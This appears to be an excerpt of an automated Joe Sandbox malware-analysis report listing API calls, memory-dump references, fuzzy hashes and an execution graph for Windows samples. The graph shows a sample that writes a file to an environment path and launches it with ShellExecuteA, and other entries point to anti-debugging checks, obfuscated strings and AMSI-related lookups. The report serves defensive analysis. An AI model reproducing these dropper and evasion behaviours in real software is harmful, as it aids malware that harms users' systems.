                                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02A0AAE7,?,?,00000000), ref: 02A0AAC1
                                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02A0AACC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4102113445-0
                                                                                                                                • Opcode ID: a1d46be3bafefbaf4a41628b4586cf9c7fb236e2a3c3aaeb0aeb8da3f453535f
                                                                                                                                • Instruction ID: ae26f15bb368818537705fed57b2af55a191ce4fcfa6ca98751730550057e52c
                                                                                                                                • Opcode Fuzzy Hash: a1d46be3bafefbaf4a41628b4586cf9c7fb236e2a3c3aaeb0aeb8da3f453535f
                                                                                                                                • Instruction Fuzzy Hash: D30142B03803047FF711FAA4EEE1B6B335DEB86B24F500120E200E66C1DE759E108A64
                                                                                                                                APIs
                                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,02A0ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02A0AB2F
                                                                                                                                  • Part of subcall function 02A0A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A0A7E2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                • String ID: eeee$ggg$yyyy
                                                                                                                                • API String ID: 4232894706-1253427255
                                                                                                                                • Opcode ID: 3862e873c866027ba1b95b2e49b40183b2cc7294b302e8d0bf860d48432974bb
                                                                                                                                • Instruction ID: c34f1baf1392161a06e2a31f47d3ff32b69392cd6d8062b0a02d759fc4349b61
                                                                                                                                • Opcode Fuzzy Hash: 3862e873c866027ba1b95b2e49b40183b2cc7294b302e8d0bf860d48432974bb
                                                                                                                                • Instruction Fuzzy Hash: 7841C0717443048BD711EBB9B9D06BEB2EBEB8A304B164525D752C33C6EE34ED01CA65
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc
                                                                                                                                • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                • API String ID: 1883125708-1952140341
                                                                                                                                • Opcode ID: 2c904fbd25966e3cbb27b562810fa781cd9f55fb9ee14477c430549ed04d3b68
                                                                                                                                • Instruction ID: 35ea500ff622f4238f69de51c0d541c0471e32e2c77faa24cab2ba24406d3467
                                                                                                                                • Opcode Fuzzy Hash: 2c904fbd25966e3cbb27b562810fa781cd9f55fb9ee14477c430549ed04d3b68
                                                                                                                                • Instruction Fuzzy Hash: 26F0C274A80704AFE705EBA4ED81D59F7EDF74D75076104A0E80083640DE34AE108925
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase,?,02A1FAEB,UacInitialize,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,Initialize), ref: 02A1F6EE
                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02A1F700
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                • API String ID: 1646373207-2367923768
                                                                                                                                • Opcode ID: 1571af695955da0e47cc27398ca98e81d6c565402682449bc868c1ec6a989f68
                                                                                                                                • Instruction ID: 27f16d7a1c860ef79e43c39f44e3ec24cd5ad8e407c790b9ba49221fd5c82ce1
                                                                                                                                • Opcode Fuzzy Hash: 1571af695955da0e47cc27398ca98e81d6c565402682449bc868c1ec6a989f68
                                                                                                                                • Instruction Fuzzy Hash: 09D012A13943906EFE0472F43CC4819038C9D54A3D7240F20B026D64D2FEA688265024
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,02A2D10B,00000000,02A2D11E), ref: 02A0C47A
                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02A0C48B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                • API String ID: 1646373207-3712701948
                                                                                                                                • Opcode ID: 9816cbdaea9fc75afd2a4d76a849558505d5b04381ac036fa202c387c8fc73a4
                                                                                                                                • Instruction ID: b44927eea57e7105e501879e515ae96a85a4fb1429f5c759921e82317045cea8
                                                                                                                                • Opcode Fuzzy Hash: 9816cbdaea9fc75afd2a4d76a849558505d5b04381ac036fa202c387c8fc73a4
                                                                                                                                • Instruction Fuzzy Hash: 3BD05EA0A803846BE610ABB97DC867122DEB328B24F008927E501451C1EF77A8A58F14
                                                                                                                                APIs
                                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A0E297
                                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A0E2B3
                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A0E32A
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 02A0E353
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 920484758-0
                                                                                                                                • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                • Instruction ID: b3787cd8e579944d307083c22dfadc67568b41d07711dc8dfb49db1b53079ce1
                                                                                                                                • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                • Instruction Fuzzy Hash: 0A411A75A416299FCB62DF58DED0BC9B3BDAF4C314F0049D5E548A7291DA30AF809F50
                                                                                                                                APIs
                                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A0AD59
                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A0AD7D
                                                                                                                                • GetModuleFileNameA.KERNEL32(02A00000,?,00000105), ref: 02A0AD98
                                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A0AE2E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3990497365-0
                                                                                                                                • Opcode ID: dcd2b77dec06f2cd6c72ef983a46a3d07ef5c7652568895ef45fd8eb98cc9c4f
                                                                                                                                • Instruction ID: 0c8b825bb0581fd4547e5113868745f2a5d42f265d3176ba1393c05db0ba9e55
                                                                                                                                • Opcode Fuzzy Hash: dcd2b77dec06f2cd6c72ef983a46a3d07ef5c7652568895ef45fd8eb98cc9c4f
                                                                                                                                • Instruction Fuzzy Hash: 68411871A403589BDB21DB68EDC4BDAB7FDAB08700F4404E5A648E7281DF74AF948F54
                                                                                                                                APIs
                                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A0AD59
                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A0AD7D
                                                                                                                                • GetModuleFileNameA.KERNEL32(02A00000,?,00000105), ref: 02A0AD98
                                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A0AE2E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3990497365-0
                                                                                                                                • Opcode ID: 33f7e55ecaea731ef515f40b5dbb641033f89fefbc699adb233a55a322c5ad96
                                                                                                                                • Instruction ID: 1887716bb46c5e71d5c4cff7b8392d687fce7ed2d5c270e121abfe2862420301
                                                                                                                                • Opcode Fuzzy Hash: 33f7e55ecaea731ef515f40b5dbb641033f89fefbc699adb233a55a322c5ad96
                                                                                                                                • Instruction Fuzzy Hash: 84412871A403589BDB21DB68EDC4BDAB7FDAB08700F4404E5A648E7282DF74AF948F54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bdc84e40527b9d58a1dbda3754e9afbc048355ae79fcc285dbf07b4e24c2b966
                                                                                                                                • Instruction ID: d18fa3b4154e0a19e5138d297370563d4054bec7a1cf9aeb88e654108f321e6f
                                                                                                                                • Opcode Fuzzy Hash: bdc84e40527b9d58a1dbda3754e9afbc048355ae79fcc285dbf07b4e24c2b966
                                                                                                                                • Instruction Fuzzy Hash: 72A1C2A67506004BD718AA7DBDC43FDB3D69B84325F18427EE11DCB2C1EF68C9528650
                                                                                                                                APIs
                                                                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02A095DA), ref: 02A09572
                                                                                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02A095DA), ref: 02A09578
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DateFormatLocaleThread
                                                                                                                                • String ID: yyyy
                                                                                                                                • API String ID: 3303714858-3145165042
                                                                                                                                • Opcode ID: 7691408d704edf4ee3329946438444a0ae3500562b60c457fdf7eb97e2fa7a6c
                                                                                                                                • Instruction ID: c291587d669a54aca8a534e3efee77bb989105aa9f056f2f187c23a2a1182b19
                                                                                                                                • Opcode Fuzzy Hash: 7691408d704edf4ee3329946438444a0ae3500562b60c457fdf7eb97e2fa7a6c
                                                                                                                                • Instruction Fuzzy Hash: E1218071A002589FDB10DFA5E9D1AAEB3B9FF08B00F4000A5E905E72D1DF30AE44CB65
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A183C2), ref: 02A183A4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                • String ID: FlushInstructionCache$Kernel32
                                                                                                                                • API String ID: 3811539418-184458249
                                                                                                                                • Opcode ID: d1fefd84c3b74be22dfffc68582af65d852d13bd8af47ba32c8b4667c01e3e71
                                                                                                                                • Instruction ID: 56d521d112ce168ca143b203ee116beb9e8327885ea70868cf12ea6af896666f
                                                                                                                                • Opcode Fuzzy Hash: d1fefd84c3b74be22dfffc68582af65d852d13bd8af47ba32c8b4667c01e3e71
                                                                                                                                • Instruction Fuzzy Hash: 25016D75680304BFF700EFA4ED81F5AB7ADF708B10F6144A0FA04D6680DE78ED108A25
                                                                                                                                APIs
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A1AF58
                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 02A1AF88
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000008), ref: 02A1AFA7
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A1AFB3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Read$Write
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3448952669-0
                                                                                                                                • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                • Instruction ID: a523e86e2fd4ec42c316538d5db496c5187789e11c66c08de2d43a6c2ec0b181
                                                                                                                                • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                • Instruction Fuzzy Hash: 4E2190B264161A9BDB10DF69DDC0BAE73AAEF40775F008512FD14D7285DF34E811CAA0

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:25%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:13.9%
                                                                                                                                Total number of Nodes:36
                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                execution_graph 247 401000 malloc 248 401031 247->248 267 401453 _XcptFilter 249 401475 memset 250 58c000 249->250 251 4014a2 __set_app_type _controlfp __getmainargs 250->251 254 4013ff 251->254 253 401518 exit 255 40141a 254->255 258 40108c memset memset 255->258 257 401443 257->253 259 401141 258->259 260 40134e 259->260 261 401164 strcmp 259->261 260->257 262 401191 EntryPoint strcpy 261->262 263 4011db EntryPoint getenv EntryPoint sprintf 261->263 264 40126b fopen EntryPoint fwrite fclose 262->264 263->264 265 401310 EntryPoint ShellExecuteA 264->265 266 401349 264->266 265->266 266->257 268 401155 269 401141 268->269 270 401164 strcmp 268->270 269->270 271 40134e 269->271 272 401191 EntryPoint strcpy 270->272 273 4011db EntryPoint getenv EntryPoint sprintf 270->273 274 40126b fopen EntryPoint fwrite fclose 272->274 273->274 275 401310 EntryPoint ShellExecuteA 274->275 276 401349 274->276 275->276 282 401526 _controlfp 283 40108c 15 API calls 282->283 284 401580 283->284 277 4015d7 SetUnhandledExceptionFilter 278 4bf794 279 4bf7a0 278->279 279->278 280 4bf8b4 GetPEB 279->280 281 4bf7e1 279->281

                                                                                                                                Callgraph

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                • String ID: %s\%s
                                                                                                                                • API String ID: 2742963760-4073750446
                                                                                                                                • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                                • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                                • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                                • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2992075992-0
                                                                                                                                • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                                • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                                • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                                • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1611591150-0
                                                                                                                                • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                                • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                                • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                                • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
